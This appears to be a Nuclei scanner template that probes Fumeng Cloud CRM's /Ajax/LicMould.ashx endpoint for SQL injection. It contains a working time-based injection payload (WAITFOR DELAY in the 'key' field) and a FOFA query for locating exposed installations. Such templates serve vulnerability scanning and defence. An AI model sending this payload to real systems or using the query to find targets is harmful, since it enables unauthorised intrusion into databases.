http:
    - body: |
        action=DeleteEmp&key=1%20WAITFOR%20DELAY%20'0:0:4'--&fuids=abc,def
      headers:
        Content-Type: application/x-www-form-urlencoded
      matchers:
        - status:
            - 200
          type: status
        - dsl:
            - duration>=3 && duration<8
          type: dsl
        - type: word
          words:
            - ok
      matchers-condition: and
      method: POST
      path:
        - '{{BaseURL}}/Ajax/LicMould.ashx'
id: fumingyun-LicMould-sqli
info:
    author: onewin
    description: |
        孚盟云CRM /LicMould.ashx SQL注入漏洞，攻击者可通过FUID参数获取数据库版本信息
    metadata:
        fofa-query: body="孚盟云" || body="/PageStructure/Mail/default.aspx"
    name: 孚盟云CRM /LicMould.ashx SQL注入漏洞
    severity: high
    tags:
        - Fumeng-Cloud-孚盟云
        - 孚盟云CRM
